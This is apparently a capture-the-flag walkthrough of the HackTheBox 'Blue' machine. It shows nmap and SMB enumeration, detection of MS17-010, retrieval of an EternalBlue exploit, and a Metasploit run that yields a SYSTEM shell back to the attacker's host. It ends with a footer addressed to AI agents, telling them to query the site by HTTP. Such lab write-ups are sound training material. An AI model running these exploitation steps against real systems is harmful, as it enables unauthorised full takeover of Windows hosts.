# Blue **Reconnaissance:** ``` ┌──(kali㉿kali)-[~] └─$ sudo nmap -sC -sV -O 10.10.10.40 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC Host script results: | smb2-time: | date: 2023-12-10T02:48:34 |_ start_date: 2023-12-10T02:39:33 |_clock-skew: mean: 0s, deviation: 1s, median: 0s | smb2-security-mode: | 2:1:0: |_ Message signing enabled but not required | smb-os-discovery: | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional | Computer name: haris-PC | NetBIOS computer name: HARIS-PC\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2023-12-10T02:48:33+00:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) ``` ``` ┌──(kali㉿kali)-[~] └─$ sudo nmap -sU -O -p- 10.10.10.40 ``` nmap found three standard Windows ports in RPC (135), NetBios (139), and SMB (445), as well as some high RPC associated ports in the 49000s. The SMB output says this is Windows 7 Professional. **SMB - TCP 445** **Shares:** \ There are a couple shares with null session read access (the trick of giving smbmap wrong creds works here): ``` ┌──(kali㉿kali)-[~] └─$ smbmap -H 10.10.10.40 ┌──(kali㉿kali)-[~] └─$ smbmap -H 10.10.10.40 -u "0xdf -p "0xdf [+] IP: 10.10.10.40:445 Name: 10.10.10.40 Status: Authenticated Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ NO ACCESS Remote IPC Share READ ONLY Users READ ONLY ``` Share is empty: ``` ┌──(kali㉿kali)-[~] └─$ smbclient //10.10.10.40/share ``` Users has just empty Default and Public folders: ``` ┌──(kali㉿kali)-[~] └─$ smbclient //10.10.10.40/users ``` **Vulns:** \ nmap has vuln scripts that will check for known vulnerabilities in service. I’ll run them here, and it finds a big one, MS-17-010: ``` ┌──(kali㉿kali)-[~] └─$ nmap -v -script smb-vuln* -p 139,445 10.10.10.40 PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds Host script results: |_smb-vuln-ms10-054: false | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ |_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND ``` **Exploitation: Shell as System** MS-17-010, otherwise known as ETERNALBLUE, is a unauthenticated remote code execution vulnerability in Windows SMB most famous for it’s leak by the Shadow Brokers and for driving the WannaCry worm in May 2017. The exploits in Metasploit for MS17-010 are much more stable than the Python script counterparts. If you’re doing this in the real world, I’d strongly recommend using Metasploit here. If you’re doing this for some kind of training activity that doesn’t allow Metasploit (like OSCP), then the downside of crashing a few boxes acceptable. I’ll show both. **Metasploit:**\ Search for a non Metasploit exploit in the Exploit Database. ``` ┌──(kali㉿kali)-[~] └─$ searchsploit --id MS17-010 ------------------------------------------------------------ --------------------------------- Exploit Title | EDB-ID ------------------------------------------------------------ --------------------------------- Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'Eter | 43970 Microsoft Windows - SMB Remote Code Execution Scanner (MS17 | 41891 Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code | 42031 Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalB | 42315 Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB R | 42030 Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SM | 41987 ------------------------------------------------------------ --------------------------------- ``` We’re working with Windows 7 so we’ll use exploit # 42315. Clone the exploit into the working directory. ``` ┌──(kali㉿kali)-[~] └─$ searchsploit -m 42315 Exploit: Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) URL: https://www.exploit-db.com/exploits/42315 Path: /usr/share/exploitdb/exploits/windows/remote/42315.py Codes: CVE-2017-0144 Verified: True File Type: Python script, ASCII text executable Copied to: /home/kali/42315.py ``` ``` ┌──(kali㉿kali)-[~/Desktop] └─$ msfconsole msf6 > search ms17-010 msf6 > use 0 msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40 msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.14.8 msf6 exploit(windows/smb/ms17_010_eternalblue) > options Running it returns a shell as SYSTEM: msf6 exploit(windows/smb/ms17_010_eternalblue) > run meterpreter > getuid meterpreter > shell ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://oscp-exodussec.gitbook.io/cheatsheet55/htb-windows-oscp-prep/blue.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.